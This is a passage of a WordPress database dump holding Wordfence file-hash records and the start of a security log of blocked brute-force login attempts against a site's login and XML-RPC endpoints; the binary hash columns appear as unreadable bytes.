s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����ħ7� �7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�D����]�|�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�P��]D��\'�-�<b','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php',0,'y-���~��I�q�s�','y-���~��I�q�s�','�I&��\n$��E:��N��r�t�\ZK(o\rͰ}��','',0,'?'),('�W��iQ^S��� ���','wp-content/themes/weblog/acmethemes/customizer/options/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�_�X�qef�j<',']�ObiЅ^��~��\"�\'ՠOE���WH','',0,'?'),('�Y��b���$���r�','wp-content/themes/healing-touch/images/free-vs-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lU�i�a�?�ש�j','b,/:�v\\����G��I3SC0Ds�kU�� �','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('��UU�p`��\rr��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-notify-system.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˑ(U�R�ww����F','T�w�b�]��U�P�� N���J�p�@��','',0,'?'),('��B���V�9�|v��F�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/settings/class-epsilon-setting-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1(:��ov)R�\'�<�`','90r���E�!Y���ف�qS��`��','',0,'?'),('��G�����2�w���','wp-content/themes/doctors/core/contents/loop_author/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|.��0��`�)�w��~','5b�ېuH�{?�w�S�����Ī����','',0,'?'),('���э�%w��~���~','wp-content/plugins/redirection/matches/referrer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j���HQ�3P�','���~A�?����2\0\\�7�ބ��4�\"����vt','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2� �/�E!�<s�','\\�=���5��3 �ώv��_%�2��A�?$','',0,'?'),('��V9�Ӷ_j��|��','wp-content/themes/doctors/core/customizer/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@\"-�(���.h�','y_0VI%�y��L�^.7�Q������S�','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('���Q�Fx���r\Z�AS','wp-content/themes/doctors/core/assets/js/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��m�u�!\"0�4�','�z�Ff�)y$���:鞲�(�?����K��','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('�])�� ���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;9���K�K�\'��!','���5.\0��$�V�u�a��+EI�H�h{ �\'','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;_Ǡ8Є��=�','\0ҧ]W��� �M�o�5m�d�p�Hb#�Wp�M\'','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�q_=�s9�N�@ũ�','(�R�Q�c�4o{]�����R��RZW','',0,'?'),('�R��Lɣ�9�o�','wp-content/themes/skt-toothy/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�\0 ���&�^L','���HPkU]r+�O���\"�\\U�ۉ~\nh��Y�','',0,'?'),('�] ���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��?ϋ�YNt)��/2','wp-content/themes/regina-lite/inc/libraries/welcome-screen/assets/css/welcome_customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�B�\r���^#�7��','�{x�.�N� ��ʮ5�y(�N���Y�QOq��k�','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��|M�S�p`gK~�','e�^��\'a;H�% V�<�e5iXT\n~T�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('��ak��fk�#���~','wp-content/themes/wp-barrister/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���s��k��{Fv','�Za(Y �m<���I��Ӟ�\r`��R�;��','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�G���!#h�9 ��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.� �ח','',0,'?'),('�Vs��ĘDU-lg�','wp-content/themes/healthcare/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T�el+����','#�g�\"i�Z�0;x�Ry�F9�1D\'�����~-','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�g� ��?�EU��r��','wp-content/themes/healthcare/css/font-awesome/scss/_stacked.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�#r&���F�','%蠢u��|F�X�)|���\r�R<�O��G','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$ ����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�TB��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�xO^4���1C)10�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˕w�S\0,cpù','j����إ���9T���������1\Z��`<�','',0,'?'),('�|��MW���j(�','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���W�\\�.��A .','��b�D���Z� 6A��m�wl�r�E��0��','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('���=�����_VI�','wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js',0,'��v+��$����%�','��v+��$����%�','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{� \n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','? ��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��H�0�C�q\"y�\n�','wp-content/themes/skt-toothy/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uj�4t��{Lx!�ܫ�','���\0����O)�ll�Qr�kO\';h���','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�0�w��t�Nl嬣','܂s�H�<�&�`�vЖX+v^=0�O]�?!�`','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ƛ�;��^\'��pD?�','�i��`)��\'B�O�踴ǹ�Z{�B�$D�87\0','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h�x��T�g�/x�','(� 7D�T��M^�����f\0��v�E','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�|Ȱ��E��?9B','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/four-column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dn\'W%:�7�\0<�','�\0\'վ�\Z����2��m8y���oJ�6','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?� �G�1','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ� �}��{~YB�v','',0,'?'),('�ͪ(���av�^�','wp-content/plugins/redirection/api/api-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H74�w \"X�5�)��R','���E�:\nJ�[���+��xw��请�@��=T�','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n� ��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+� v0~','4��-<4�,\"V�ȱXʘî�hR� K�F�k�','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�?.O��4�o��V֡','��f��ɲ��AE�u�k���L�t+KZ �Ť�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('�]\"�@����ե%.�$','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-alpha.php',0,'�J���>T�If�jl�`','�J���>T�If�jl�`','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('�z��A�?5�H�','wp-content/themes/healthcare/images/responsive-pro.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Қ-�> �|�j �','$7����.\\}[_j�N�H����W�ӜY6�','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>�� \0Ϧ','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','���������%*�kb$�ZR��f�i�`�','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z� h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('���=�)L6�SA�W\0kZ','wp-content/themes/healthcare/css/font-awesome/scss/_icons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޟ�B�a���OB�k�0','���T1B��!�T�a��Jz����m��!Ąy(','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL \'8FJ','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�W��:�.p�j[yyQ','v�6$�-���ȓ��k�Z��Op��]�\"�r5','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhits`
--
DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`attackLogTime` double(17,6) unsigned NOT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`jsRun` tinyint(4) DEFAULT 0,
`statusCode` int(11) NOT NULL DEFAULT 200,
`isGoogle` tinyint(4) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`newVisit` tinyint(3) unsigned NOT NULL,
`URL` text DEFAULT NULL,
`referer` text DEFAULT NULL,
`UA` text DEFAULT NULL,
`action` varchar(64) NOT NULL DEFAULT '',
`actionDescription` text DEFAULT NULL,
`actionData` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`IP`,`ctime`),
KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=8607 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhits`
--
LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (6641,1629239348.580923,1629239348.500400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6642,1629239287.521302,1629239287.450700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6643,1629239286.917726,1629239286.833400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6644,0.000000,1629239774.521076,'\0\0\0\0\0\0\0\0\0\0��ŜJ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6645,1629239871.272378,1629239871.190700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6646,1629239870.730543,1629239870.648300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6647,0.000000,1629240065.601321,'\0\0\0\0\0\0\0\0\0\0���@t�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6648,1629240108.935867,1629240108.865700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6649,1629240108.308505,1629240108.207100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: 